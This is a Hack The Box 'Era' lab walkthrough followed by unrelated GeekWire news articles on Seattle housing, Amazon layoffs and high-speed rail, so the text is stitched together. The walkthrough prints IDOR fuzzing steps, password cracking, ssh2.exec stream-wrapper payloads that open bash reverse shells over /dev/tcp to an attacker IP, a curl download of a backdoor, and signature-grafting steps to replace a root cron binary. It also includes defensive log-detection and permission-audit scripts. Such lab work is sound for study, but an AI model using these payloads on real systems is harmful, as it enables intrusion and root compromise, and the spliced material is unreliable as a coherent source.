
Hack The Box: Era Machine Walkthrough – Medium Difficulty

By: darknite
29 November 2025 at 15:06

Introduction:

In this writeup, we will explore the “Era” machine from Hack The Box, categorized as a Medium-difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Era” machine from Hack The Box by achieving the following objectives:

User Flag:

Initial enumeration revealed a hidden virtual host file.era.htb and a simple file-sharing web application that allowed registration and login. After creating an account, it quickly became clear that the download.php endpoint suffered from a severe Insecure Direct Object Reference (IDOR) vulnerability: any authenticated user could access any file on the platform simply by guessing its numeric ID. By fuzzing IDs 1–5000, two admin-uploaded archives were retrieved – a complete site backup containing the source code and SQLite database, and a signing.zip archive containing an SSH private key. The leaked database also exposed clear-text credentials, including eric:america. Because the ssh2 PHP extension was loaded on the server, the ssh2:// stream wrapper could be abused through the same vulnerable download endpoint.

Root Flag:

While exploring the system as eric, a root-owned executable /opt/AV/periodic-checks/monitor was discovered that runs periodically via cron (confirmed by entries in status.log). The binary performed a custom integrity check using a digital signature stored in an ELF section named .text_sig. Using objcopy, the legitimate signature was extracted from the original binary. On the attacker’s machine, a malicious statically linked reverse-shell binary (monitor_backdoor) was compiled, and the legitimate .text_sig section was injected into it with objcopy --add-section. The backdoored binary was then transferred to the target and used to overwrite the original monitor executable (the directory was world-writable). When the cron job next executed, the malicious binary ran as root and immediately connected back, delivering a root shell. The root flag was then read directly from /root/root.txt, completing the compromise.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

Nmap Output:

Analysis:

  • Port 22 (SSH): Secure Shell service for remote access.
  • Port 80 (HTTP): Web server running Apache.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.

Gobuster DNS scan on era.htb finishes with no subdomains found — clean miss on the big wordlist. Time to dig deeper or move to vhost/directory brute.

Discovering the Hidden Virtual Host with ffuf

ffuf virtual-host brute on era.htb reveals file.era.htb (302 redirect + different response size) — jackpot! That’s our real target. Add to /etc/hosts and move in.

ffuf with -fw 4 (filter responses with exactly 4 words) nails it — file.era.htb returns 200 + 6765 bytes while everything else 302s with tiny bodies. Clear hit, that’s our hidden subdomain. Add to hosts and go!

Exploitation

Web Application Exploration:

Accessing http://era.htb shows the Era Designs homepage—a clean marketing site with navigation (Home, Services, About, Portfolio, Clients, Team, Contact) and a hero section featuring yellow vases, a white sofa, and “SUCCESS OF YOUR BUSINESS” text with a “FIND OUT MORE” button.

Burp shows a clean GET to http://era.htb → 200 OK from nginx/1.18.0 (Ubuntu). Response is a standard Bootstrap-styled marketing page titled “Era Designs” with no forms or backend endpoints – just a static landing site. Nothing juicy here.

Clean “Welcome to Era Storage!” page with four big blue buttons: Manage Files, Upload Files, Update Security Questions, and Sign In. This is the main hub of the entire app.

Very minimal registration: only two fields – Username and Password. No email, no captcha, no security questions during signup.

Forgot-password bypass: enter username and answer the three hardcoded questions (mother’s maiden name, first pet, city of birth).

Classic centred login box with Username + Password on a blue-green gradient background – the page we’re redirected to after registration.

Successful POST to /register.php → 200 OK + automatic redirect to login.php. Account creation confirmed.

After picking a new username (e.g., “dark”), registration succeeds and the app displays: “Registration successful! Redirecting to login page…” → account creation is instant and working.

POST to /login.php with username=dark&password=admin123 returns 302 Found → Location: manage.php and sets a PHPSESSID cookie. We are now authenticated as the “dark” user.

GET to /manage.php with the same PHPSESSID cookie returns 200 OK and the full HTML of the logged-in dashboard (title: “Era – Manage”).

The main post-login page “Manage Your Files & Settings” shows:

  • Left sidebar: Manage Files, Upload Files, Update Security Questions, Sign Out
  • Main area: auto-delete timer setting, empty file list (“You haven’t uploaded any files yet.”), Reset Security Questions button

This is the fully authenticated user panel — our foothold is confirmed.

Malicious PHP Upload → Direct Shell

Authenticated view of /upload.php. Simple file upload form titled “Upload Files” with a “Browse…” button (currently “No files selected.”) and a blue “Upload” button. No restrictions visible on file type or size yet.

Same upload page, but now the user has selected a harmless file named dark.txt. Shows the form ready to submit — this is just confirming normal upload functionality works.

After uploading dark.txt, the app redirects to /download.php?id=6615 and shows “Your Download Is Ready!” with the filename and a download button. Key observation: files are accessed via a numeric id parameter → classic candidate for Insecure Direct Object Reference (IDOR).

After clicking “Upload”, the app displays a green “Upload Successful!” banner and immediately provides a direct download link in the format: http://file.era.htb/download.php?id=6615 This confirms uploads work and every file gets its own numeric ID — setting the stage for IDOR testing and potential privilege escalation via file access across users.

Legitimate request to http://file.era.htb/download.php?id=6615 returns the expected “Your Download Is Ready!” page with our uploaded file dark.txt. Confirms the download endpoint works normally for files we own.

Appending ?dl=true to the same request (download.php?id=6615&dl=true) bypasses the pretty download page and triggers an immediate file download:

  • Content-Type: application/octet-stream
  • Content-Disposition: attachment; filename="dark.txt"

This is extremely useful for scripting/automation because we get the raw file without HTML.

Quickly create a list of all possible numeric file IDs from 1 to 5000. This will be used for brute-forcing the id parameter in download.php to find other users’ files.

Database Leak & Credential Extraction

Final setup in Burp Intruder:

  • Target: http://file.era.htb
  • Payload position marked on the id parameter (id=6615 → id=§6615§)
  • Payload type: Numbers 1 → 5000 (simple list)
  • ?dl=true added so every hit immediately downloads the raw file instead of showing HTML

Ready to launch the attack that will download every single file ever uploaded by any user on the platform.

Burp Intruder attack against download.php?id=§§&dl=true using the 1–5000 payload list. All responses are 200 OK and exactly 7969 bytes long — including our own known file. This tells us there is no authorization check at all; every single existing file ID returns the exact same response length, meaning the server happily serves any file the numeric ID points to → confirmed horizontal Insecure Direct Object Reference (IDOR).

After confirming the IDOR on download.php?id=, we generate a list of IDs 1–5000 (seq 1 5000 > num.txt) and fuzz with ffuf, injecting our authenticated cookie and filtering out responses with exactly 3161 words (the empty download page). Only two IDs survive: 54 and 150. Both return much larger responses (~2552 words), indicating real files.

Insecure Direct Object Reference (IDOR)

Accessing http://file.era.htb/download.php?id=54 reveals the filename site-backup-30-08-24.zip. This is the full source code backup of the Era file-sharing web app, uploaded by the admin.

Response headers confirm we’re downloading the raw site-backup-30-08-24.zip (2006697 bytes). The body starts with PK header (ZIP magic bytes).

Accessing http://file.era.htb/download.php?id=150 shows signing.zip. This smaller archive contains a private key and possibly a signing script – likely for code signing or authentication.

Response forces download of signing.zip (2746 bytes). This archive contains the admin’s private key (id_rsa) and a script – the golden ticket for SSH access as the admin/user.

Source Code Review – Key Vulnerabilities Exposed in the Leak

After downloading IDs 54 and 150 via IDOR, we extract both ZIPs. One is site-backup-30-08-24.zip (clearly a website backup) and the other is signing.zip.

This is the full source code of the Era web application, straight from the admin’s upload (ID 54). Key files visible during extraction:

  • download.php, upload.php, index.php – core functionality
  • filedb.sqlite – the SQLite database storing users, sessions, and file metadata
  • files/ directory – where uploaded files are stored on disk
  • functions.global.php, initial_layout.php, etc. – backend logic
  • .htaccess, login.php, logout.php – authentication flow

With this backup in hand, we now have everything:

  • Complete code review capability
  • The database (filedb.sqlite) to dump credentials or session secrets
  • Exact knowledge of how the IDOR works internally

This is the live SQLite database powering the entire Era application – straight from the admin’s site backup we downloaded via IDOR.

We’ve opened the real filedb.sqlite from the site backup and immediately listed the tables. As expected:

  • users → stores usernames, password hashes, etc.
  • files → maps numeric IDs to real filenames and owners (confirms the IDOR logic)

After extracting the site backup, we opened the leaked filedb.sqlite and dumped the users table with SELECT * FROM users;. The result reveals six accounts, including the admin (ID 1) with the bcrypt hash $2y$10$wDbohsUaezF74d3SMNRPi.o93wDxJqphM2m0VVup41If6WrYi.QPC and a fake email “Maria Oliver | Ottawa”. The other five users (eric, veronica, yuri, john, ethan) also have proper bcrypt hashes. This gives us every credential on the box in plain text (hash) form, but we don’t even need to crack anything — the signing.zip we downloaded via the same IDOR already contains the admin’s SSH private key. The database dump is just the cherry on top, confirming total information disclosure and proving the IDOR let us steal every secret the application ever had. We’re now one ssh -i id_rsa admin@file.era.htb away from both flags.

Cracking the Leaked Hashes with John the Ripper

We dumped the users table into hash.txt for cracking. It contains six bcrypt hashes, including the admin’s: admin_ef01cab31aa:$2y$10$wDbohsUaezF74d3SMNRPi.o93wDxJqphM2m0VVup41If6WrYi.QPC and the other five regular users.

John instantly cracks two weak passwords:

  • america → eric
  • mustang → yuri

The rest (including admin) remain uncracked in the short run.

Both attempts fail with Connection refused.

This confirms that only key-based authentication is allowed on the box (port 22 is open but rejects password logins entirely). The weak passwords we just cracked (america, mustang) are useless for SSH — the server is correctly hardened against password auth.

Alternative way to obtain the user flag

This is the “Update Security Questions” page from the Era web app, captured while logged in as the admin (admin_ef01cab31aa). The admin literally set all three security-question answers to admin.

The server happily accepted it and responded with the green banner: “If the user exists, answers have been updated — redirecting…”

This confirms that there is no validation for security-question updates. Any logged-in user can silently overwrite anyone else’s answers (including the admin’s) without knowing the old ones. Combined with the predictable username (admin_ef01cab31aa visible in the UI), this is a second, independent path to full account takeover via the forgot-password flow.

Screenshot shows a settings panel designed for managing uploaded files and controlling their retention time. At the top, an option allows automatic deletion to be enabled, letting the user choose a specific time interval and unit before files are removed. Below the settings, the interface lists existing uploaded files, such as dark.txt, which can be selected and deleted using the Delete Selected Files button. Additional options, including returning to the home page and resetting security questions, provide quick access to important account functions. Overall, the panel centralizes file management, privacy controls, and routine account maintenance.

Screenshot shows a login fallback page that allows access through security questions instead of a password. The interface displays the username along with three predefined security questions: mother’s maiden name, first pet’s name, and city of birth. Each answer field has been filled with the value admin, suggesting that the account uses weak or predictable answers. After providing the answers, the user can click Verify and Log In to gain access. Overall, the page functions as an alternative authentication method, typically intended for account recovery when the main password is unavailable.

The auto-deletion feature is enabled, configured to remove uploaded items after 10 weeks. Two files are currently present—site-backup-30-08-24.zip and signing.zip—both of which can be selected for removal using the red action button. The sidebar on the left offers quick links for browsing files, uploading new ones, modifying security questions, and signing out of the session. Overall, the page offers a simple layout for organizing uploaded content and managing basic account settings.

FTP Enumeration (Local-Only vsFTPd – Optional Side Discovery)

Attacker logs into the target’s own vsftpd service (running on 10.10.11.79) using credentials yuri:yuri. Login succeeds instantly.

Inside the FTP session, dir shows only two directories: apache2_conf and php8.1_conf. Nothing else is present.

Inside the FTP session (logged in as yuri), the attacker runs dir in the root directory and sees only four small Apache configuration files:

  • 000-default.conf (1.3 KB)
  • apache2.conf (7 KB)
  • file.conf (222 bytes)
  • ports.conf (320 bytes)

Gaining User Shell – ssh2 Stream Wrapper RCE

After cd php8.1_conf, another dir reveals a long list of standard PHP 8.1 extension .so files (calendar.so, exif.so, ftp.so, pdo.so, phar.so, sqlite3.so, etc.). No interesting or custom files appear.

The internal vsFTPd instance is nothing more than a poorly chrooted service that accidentally exposes Apache configuration files and the real PHP extension directory. It provides zero writable paths, no sensitive data beyond what we already knew, and no escalation value. Just a nice confirmatory easter egg that the ssh2 extension is indeed loaded — but completely unnecessary for either the user or root compromise.

Screenshot reveals successful exploitation of an unrestricted file retrieval flaw on file.era.htb. Attacker submits a malicious GET request to download.php, weaponizing PHP’s ssh2.exec stream wrapper alongside command injection. Payload inside id parameter uses ssh2.exec://eric:america@127.0.0.1/ then pipes a base64-encoded reverse shell that instructs victim host to initiate connection toward attacker address 10.10.14.189 on port 9007. Flawed script directly feeds user-supplied input into readfile() or equivalent without validation. PHP detects ssh2.exec wrapper, authenticates locally via SSH as user eric using password america, executes hostile command, and returns resulting output (nearly empty) as response body. Web server replies with 200 OK and 136 bytes of data, confirming reverse shell triggered successfully. Exploit highlights classic stream-wrapper abuse transforming simple download vulnerability into complete remote code execution.

This second capture shows a polished version of the same remote code execution attack against download.php on file.era.htb. Attacker now places a cleaner payload inside the format parameter: ssh2.exec://eric:america@127.0.0.1/bash -c ‘bash -i >/dev/tcp/10.10.14.189/9007 0>&1’ followed by |base64 -d |bash. After URL decoding, PHP interprets the ssh2.exec wrapper, authenticates to localhost SSH as user eric using password america, runs the quoted reverse-shell command, decodes any remaining base64 payload if needed, and finally spawns an interactive bash session that connects back to 10.10.14.189:9007. Server returns HTTP 200 OK with a 153-byte body containing wrapper startup messages, confirming successful command execution. Compared to the previous attempt, this refined one-liner removes unnecessary encoding layers while remaining effective, proving the attacker now enjoys a stable reverse shell on the target system.

Attacker stuffs this tightly-encoded string into the format parameter:

ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%22bash%20-i%3E%26/dev/tcp/10.10.14.189/9007%200%3E%261;true%27

Once decoded, PHP sees:

ssh2.exec://eric:america@127.0.0.1/bash -c “bash -i>&/dev/tcp/10.10.14.189/9007 0>&1;true'”

Every dangerous character (< > &) appears percent-encoded, slipping past basic filters. The trailing ;true’ cleanly terminates the command and avoids breaking bash syntax. No base64 gymnastics required.

PHP dutifully opens a local SSH session as user eric with password america, runs the quoted command, and instantly redirects all shell I/O over TCP to 10.10.14.189:9007. Result: a clean, stable, fully interactive reverse shell that survives repeated use. Target machine now belongs to the attacker.

On the attack machine, netcat listens on port 9007 (nc -lvnp 9007). As soon as the final ssh2.exec payload hits download.php, the target instantly connects back from IP 10.10.11.79. Shell lands as user eric on hostname era (prompt: eric@era:~$).

Eric managed to read user.txt and obtained the flag.
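Added example, not part of the original writeup: both the ID sweep against download.php and the later stream-wrapper request leave distinctive entries in the web server's access log, and the script below flags them. The combined-log layout, client addresses, thresholds and function names are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A decoded parameter value that starts with "scheme://" (ssh2.exec://, php://, ...).
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
NUMERIC_RE = re.compile(r"[0-9]+")


def build_sample_log():
    """Constructed log lines: one normal user, one ID sweep, two malformed requests."""
    base = datetime(2025, 11, 29, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "GET {target} HTTP/1.1" 200 7969 "-" "constructed-agent"'

    def line(ip, offset, target):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return fmt.format(ip=ip, ts=ts, target=target)

    lines = [line("10.0.0.5", 0, "/download.php?id=6615"),
             line("10.0.0.5", 2, "/index.php")]
    lines += [line("10.0.0.9", i, f"/download.php?id={i}&dl=true") for i in range(1, 41)]
    lines.append(line("10.0.0.9", 300,
                      "/download.php?id=54&dl=true&format=ssh2.exec%3A%2F%2Fu%40127.0.0.1%2F"))
    lines.append(line("10.0.0.7", 310, "/download.php?id=abc"))
    return lines


def parse_access_log(lines):
    """Return one event per request to /download.php, with decoded query parameters."""
    events = []
    for raw in lines:
        m = LINE_RE.match(raw)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != "/download.php":
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        events.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "params": params,
            "id": params.get("id", [None])[0],
        })
    return events


def find_enumeration(events, window=timedelta(seconds=60), threshold=20):
    """Map client -> most distinct file IDs requested inside any one window."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["id"] is not None and NUMERIC_RE.fullmatch(ev["id"]):
            by_ip[ev["ip"]].append((ev["ts"], int(ev["id"])))
    flagged = {}
    for ip, hits in by_ip.items():
        hits.sort()
        left, counts, best = 0, defaultdict(int), 0
        for ts, file_id in hits:
            counts[file_id] += 1
            while ts - hits[left][0] > window:      # slide the window forward
                old = hits[left][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                left += 1
            best = max(best, len(counts))
        if best >= threshold:
            flagged[ip] = best
    return flagged


def find_bad_parameters(events):
    """Flag URL schemes in any parameter and non-numeric values in id."""
    findings = []
    for ev in events:
        for name, values in ev["params"].items():
            for value in values:
                if SCHEME_RE.match(value):
                    findings.append((ev["ip"], name, "url-scheme"))
                elif name == "id" and not NUMERIC_RE.fullmatch(value):
                    findings.append((ev["ip"], name, "non-numeric-id"))
    return findings


if __name__ == "__main__":
    evs = parse_access_log(build_sample_log())
    print("enumeration:", find_enumeration(evs))
    print("bad parameters:", find_bad_parameters(evs))
```

Keying on the client address is a simplification; where the session identifier is logged, grouping by session gives fewer false positives behind shared proxies.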

Escalate to Root Privileges Access

Privilege Escalation:

Eric runs sudo -l to check which sudo privileges are available. The system replies that a terminal and password are required, meaning eric has no passwordless sudo rights and cannot directly escalate using sudo.

Eric executes find / -perm 4000 2>/dev/null to hunt for SUID binaries system-wide. The command returns no results (screen stays empty), indicating no obvious SUID files exist that could be abused.

Eric navigates to /opt and runs ls. Output shows a single directory named AV. This immediately catches attention — custom software installed under /opt is a classic spot for privilege-escalation vectors on HTB machines.

Eric enters /opt/AV/periodic-checks and runs ls. Two files appear: monitor (a root-owned executable) and status.log. The presence of a root-owned binary in a writable directory strongly suggests this monitor program runs periodically as root (likely via cron) and will be the intended privilege-escalation target.

I run strings monitor. Among normal library calls, two crucial strings appear: “[] System scan initiated…” and “[] No threats detected. Shutting down…”. These exact strings match the log entries, proving monitor is the binary executed by root during each scan.

I check status.log in /opt/AV/periodic-checks. The log shows the monitor binary runs periodically as root, prints “[*} System scan initiated…”, then “[SUCCESS] No threats detected.” – confirming it is a scheduled root job and the real escalation target.

Custom Binary Signature Bypass

We try to open a file called dark.c inside /dev/shm but vi fails with “command not found”. This reveals the reverse shell lacks a proper $PATH and most binaries – a common issue with raw /dev/tcp shells.

On the attacker’s local machine, the file dark.c contains a simple malicious payload: a single system() call that spawns another reverse shell back to 10.10.14.189:9007. The attacker has prepared this source code to compile and drop on the target.

On the attacker’s local machine, gcc compiles the malicious dark.c source into a statically linked binary named monitor_backdoor – a perfect drop-in replacement for the legitimate monitor program.

I use curl http://10.10.14.189/monitor_backdoor -o monitor_backdoor to download the final backdoored binary from the attacker’s web server directly into the current directory (or /dev/shm). The transfer completes successfully (754 KB at ~1.4 MB/s).

The stage is now set: once the original monitor binary is replaced with this backdoor, the next root cron execution will instantly grant a root shell back to the attacker.

A command such as objcopy --dump-section .text_sig=sig /opt/AV/periodic-checks/monitor extracts the original monitor binary’s .text_sig section (a custom digital signature) and saves it as a file called sig inside /dev/shm.

I run objcopy --add-section .text_sig=sig monitor_backdoor, injecting the legitimate signature extracted from the real monitor into the malicious backdoored version. This preserves the signature so the root-run scanner will accept the fake binary.

The attack is completed by overwriting the legitimate monitor binary with the backdoored version: cp monitor_backdoor /opt/AV/periodic-checks/monitor. The root-owned executable that runs periodically via cron is now fully replaced.

The cron job fires, executes the backdoored monitor as root, and the payload instantly triggers. Attacker catches a new reverse shell that lands directly as root@era: ~#. The box is fully compromised.

Root reads the final flag immediately after gaining the privileged shell.
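Added example, not part of the original writeup: the replacement succeeded because the directory holding the root-run monitor was writable by a non-root user, so the audit below checks a cron-executed binary and every ancestor directory for write access by anyone outside a trusted set. The function names, the trusted uid/gid parameters and the temporary directory tree are assumptions made for the demonstration.

```python
import os
import stat
import tempfile
from pathlib import Path


def untrusted_write(st, trusted_uids, trusted_gids):
    """Return why an account outside the trusted set can modify this inode, else None.

    Only classic mode bits are inspected; POSIX ACLs are not covered here.
    """
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid not in trusted_gids:
        return f"writable by gid {st.st_gid}"
    return None


def audit_exec_path(path, trusted_uids=frozenset({0}), trusted_gids=frozenset({0})):
    """Audit a binary that a privileged job runs, plus each directory above it.

    Write access to any ancestor directory is enough to swap the binary,
    because the directory entry can be renamed or recreated.
    """
    findings = []
    target = Path(path).resolve(strict=True)
    child_st = None
    for node in (target, *target.parents):
        st = node.stat()
        reason = untrusted_write(st, trusted_uids, trusted_gids)
        is_dir = node != target
        if reason and is_dir and st.st_mode & stat.S_ISVTX:
            # Sticky directory (like /tmp): only the entry's owner, the directory's
            # owner or root may rename or unlink the entry, so a trusted-owned
            # entry in a trusted-owned sticky directory cannot be replaced.
            if st.st_uid in trusted_uids and child_st.st_uid in trusted_uids:
                reason = None
        if reason:
            findings.append((str(node), "directory" if is_dir else "file", reason))
        child_st = st
    return findings


def demo():
    """Build a constructed tree shaped like AV/periodic-checks/monitor and audit it."""
    base = Path(tempfile.mkdtemp()).resolve()
    # The current user stands in for root so the demo runs unprivileged.
    uids, gids = frozenset({os.getuid()}), frozenset({os.getgid()})
    checks = base / "AV" / "periodic-checks"
    checks.mkdir(parents=True)
    monitor = checks / "monitor"
    monitor.write_bytes(b"constructed placeholder, not a real binary")
    for node in (base, base / "AV", monitor):
        node.chmod(0o755)

    def audit():
        # Ignore system directories above the constructed tree.
        return [f for f in audit_exec_path(monitor, uids, gids)
                if f[0].startswith(str(base))]

    checks.chmod(0o777)          # weak: anyone can replace entries in the directory
    before = audit()
    checks.chmod(0o755)          # corrected: only the owner can modify the directory
    after = audit()
    return before, after


if __name__ == "__main__":
    weak, fixed = demo()
    print("weak layout:", weak)
    print("fixed layout:", fixed)
```

On a real host, call audit_exec_path with the default trusted sets on each path that root's cron entries and systemd units execute.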

The post Hack The Box: Era Machine Walkthrough – Medium Difficulty appeared first on Threatninja.net.

Seattle’s tech paradox: Amazon’s layoffs collide with the AI boom — or is it a bubble?

1 November 2025 at 11:36
Image created by Google Gemini based on the audio of this week’s GeekWire Podcast.

This week on the GeekWire Podcast: Why is Amazon laying off 14,000 people in the middle of an AI boom — and is it really a boom at all? We dig into the contradiction at the heart of Seattle’s tech scene, discussing Amazon CEO Andy Jassy’s “world’s largest startup” rationale and what it says about the company’s culture and strategy. And we debate whether AI progress represents true transformation or the familiar signs of a tech bubble in the making.

Then we examine the vision of Cascadia high-speed rail — the ambitious plan to connect Portland, Seattle, and Vancouver, B.C., by bullet train. Is it the regional infrastructure needed to power the Pacific Northwest’s next chapter, or an expensive dream looking for a purpose?

With GeekWire co-founders John Cook and Todd Bishop


The ‘enormous barrier’ that threatens economic growth in the Pacific Northwest

30 October 2025 at 14:47
A life sciences panel at the Cascadia Innovation Corridor conference Oct. 29, 2025 in Seattle. From left: Marc Cummings, Life Science Washington; Dr. Bonnie Nagel, Oregon Health Sciences University; Dr. Tom Lynch, Fred Hutch Cancer Center. (“PhotosbyKim” Photo)

Leaders in the Pacific Northwest are largely bullish on the region’s continued economic success — but one threat to the region’s fiscal progress worries them in particular.

“What always strikes me, whether I’m in City Hall in Vancouver or Seattle or Portland, is that everybody talks about the same thing — the high cost of housing,” said Microsoft President Brad Smith at this week’s Cascadia Innovation Corridor conference in Seattle.

“It’s become an enormous barrier, not just for attracting new talent, but for enabling teachers and police officers and nurses and firefighters to live in the communities in which they serve,” he added.

Dr. Tom Lynch, president and director of Seattle’s Fred Hutch Cancer Center, was more succinct.

“My people can’t find places to live,” Lynch said during a Tuesday panel at the same event.

Those concerns are bolstered by research in a new report on the economic viability of the corridor running from Vancouver, B.C., through Seattle to Portland.

Housing costs were cited as one of the top threats to the region’s success, noting that Vancouver’s housing-cost-to-income-ratio disparity is among the worst in the world, while in Seattle median home prices relative to wages have doubled in the past 15 years. Portland reports a net out-migration as workers move to more affordable areas.

Other concerns include rising business costs and regulations, declining numbers of skilled workers and new restrictions on foreign talent immigrating to the U.S., and clean energy shortages.

Microsoft President Brad Smith speaking at the Cascadia Innovation Corridor conference. (GeekWire Photo / Todd Bishop)

“We’ve got to find ways to be able to increase the density of our housing, come up with creative solutions for allowing more families to be able to live close to where the jobs are,” Lynch said.

Smith agreed, adding, “The only way to dig ourselves out of this is to harness the power of the market through public-private partnerships, to recognize that zoning and permitting needs to be put to work to accelerate investment.”

Area tech giants have been pursuing those partnerships to tackle the challenge.

In 2019, Microsoft pledged $750 million to boost the affordable housing inventory and has helped build or retain 12,000 units in the region. Amazon in recent years has committed $3.4 billion for housing across three hubs nationally where it has large operations. The company in September celebrated a milestone of building or preserving 10,000 units in the Seattle area.

Despite the efforts, Smith said the shortage keeps worsening and in 2025, new construction starts are expected to be the lowest since before the Great Recession.

The city of Seattle, for one, is looking to sweeten a property-tax exemption deal for developers that could encourage construction, and it’s also applying AI to the permitting process in an effort to speed up projects.

Smith also promoted the long-held vision of a high-speed rail line in the Pacific Northwest that would make commutes much faster between growing urban hubs. But a panel Wednesday cautioned that dream is still many years out.

Slowly but surely, high-speed rail backers believe Cascadia mega-project will become a reality

30 October 2025 at 11:30
(Photo by 7 on Unsplash)

Ten years into a dream to connect Vancouver, B.C., Seattle and Portland via a high-speed rail line, stakeholders and backers of the mega-project said Wednesday that they’re still very much onboard — and to prepare for a long trip.

With a lengthy and uncertain timeline ahead, former U.S. Secretary of Transportation Ray LaHood, a speaker at the Cascadia Innovation Corridor conference in Seattle, cautioned many of those in attendance that they likely won’t live long enough to see high-speed rail in the Pacific Northwest.

“When you build big things, they cost big money,” LaHood said. “It took us 50 years to build the interstate system.”

LaHood said the key is to “get on board” now so that “our children and grandchildren” will reap the benefits.

Former U.S. Secretary of Transportation Ray LaHood, left, discusses high-speed rail with Washington State Sen. Marko Liias onstage at the Cascadia Innovation Corridor annual conference in Seattle on Wednesday. (GeekWire Photo / Kurt Schlosser)

At Cascadia Innovation Corridor’s annual event this week, much of the focus was on how to strengthen the cross-border partnership between three growing cities and numerous locales in between. Leaders discussed ideas around innovation, housing affordability, sustainability, and economic development. They signed a Memorandum of Reaffirmation to solidify commitments.

And Wednesday was about the enhanced transportation connectivity that could help drive it all, and the work that lies ahead in building a coalition of public and political support across the region, securing funding, jumpstarting planning, and more. Even producing videos like the new one below is part of the massive outreach under way.

Former Washington Gov. Chris Gregoire, Cascadia Innovation Corridor’s chair, said that a decade ago, high-speed rail was just an idea. The next decade can be a defining one.

“You would have thought we were thinking of doing something in outer space by the reaction,” she said. “Today, it is much more than an idea, and we are actually moving forward. While we do have a long way to go, as you well know, we’re funding the first phase of planning built on one of the most unique coalitions in North America.”

Envisioning a mega-region akin to Silicon Valley, in which Vancouver, Seattle and Portland are each only an hour apart, Gregoire highlighted the possibilities that could come with high-speed mobility.

“A UW student can intern in Vancouver, a family in Puget Sound can explore a job in Portland, and a cancer researcher in Vancouver can get home for dinner after a shift in Seattle,” she said. “It’s a new way of living, working and connecting, one that expands what’s possible for everyone who calls Cascadia home.”

Former Washington Gov. Chris Gregoire, chair of the Cascadia Innovation Corridor, speaks at the group’s annual conference in Seattle on Wednesday. (GeekWire Photo / Kurt Schlosser)

The pace to make the dream a reality has been anything but high-speed.

In 2017, Microsoft — which has an office in downtown Vancouver — gave $50,000 to a $300,000 effort led by Washington state to study a high-speed train proposal. In 2021, officials from Washington, Oregon and British Columbia signed a memorandum of understanding to form a committee to coordinate the plan.

Last year, the Federal Railroad Administration awarded the Washington State Department of Transportation $49.7 million to develop a service development plan for Cascadia High-Speed Rail. A timeline on WSDOT’s website points to 2028 for estimated completion of that plan, and for 2029 and beyond it simply says, “future phases to be determined.”

Cascadia is not alone in its quest for high-speed rail.

LaHood, a Republican cabinet member in the Obama administration, recalled the former president’s commitment to rail transportation. He said the Trump administration “clawing back” $4 billion in funding for California’s high-speed rail project between San Francisco and Los Angeles should not be considered a “death knell,” despite challenges in that state.

LaHood pointed to Brightline train projects in Florida, connecting Orlando and Miami, and Las Vegas, with a plan to offer high-speed connectivity to Southern California. Another plan in Texas would connect Houston and Dallas. All are evidence, he said, that this mode of transportation is what Americans want in order to avoid clogged highways and airports.

“Once the politicians catch on to what the people want, boom, you get the kind of rail transportation that people are clamoring for,” LaHood said.

Here are highlights from other speakers at the conference on Wednesday:

Chelsea Levy, Cascadia High-Speed Rail project manager for the Washington State Department of Transportation, during the Cascadia Innovation Corridor conference. (GeekWire Photo / Kurt Schlosser)
  • WSDOT Secretary Julie Meredith pointed to big Seattle transportation infrastructure projects that transformed the city, including the removal of the Alaskan Way Viaduct and construction of the SR 99 waterfront tunnel, as well as the new SR 520 floating bridge. Even as work will continue for years connecting communities via Link light rail, Meredith said, “I so often describe this program as one I’m most excited about, because it’s an opportunity for us to so fundamentally transform our region up and down the I-5 corridor.”
  • Chelsea Levy, Cascadia High-Speed Rail project manager, said the region can expect a 25% increase in population, or about 3.4 million more people, by 2050. “This pace and magnitude of growth really requires us to act,” Levy said. Among other things, WSDOT will need to integrate with B.C. and Oregon transportation networks and, Levy stressed, the scale and complexity of the project will require a streamlining of permitting processes across the 345-mile mega-region.
  • Hana Doubrava, a Vancouver-based corporate affairs director at Microsoft, leads the Cascadia initiative for the tech giant. She said the company’s support is not just symbolic, and that Microsoft believes modern, efficient transit and transportation options are essential for improved quality of life. “Cascadia is all about partnerships and relationships — despite the current geopolitics or baseball scores,” she said in a nod to Canada’s team, the Toronto Blue Jays, denying the Seattle Mariners a trip to the World Series.


Microsoft’s Brad Smith makes nuanced AI pitch: Huge potential, real concerns, and a Jon Stewart clip

29 October 2025 at 12:16
Former Washington Gov. Chris Gregoire and Microsoft President Brad Smith at the 2025 Cascadia Innovation Corridor Conference. (GeekWire Photo / Lisa Stiffler)

It’s rare for a tech executive to cue up a video mocking themselves — but that’s just what Microsoft President Brad Smith did on Tuesday at the Cascadia Innovation Corridor conference in Seattle. Smith played a clip from The Daily Show in which comedian Jon Stewart lampooned his and Microsoft CEO Satya Nadella’s interviews about AI’s impact on jobs.

The segment poked fun at the idea that displaced workers might become “prompt engineers” — a new job Stewart rebranded as “types questions guy.”

It was a self-aware feature of a talk that balanced enthusiasm for artificial intelligence’s potential with sober reflections on its hype and potential pitfalls.

The Microsoft leader called AI the “next great general purpose technology” on par with electricity. He said AI will transform sectors including health, education, biotech, aerospace, agriculture, climate and others.

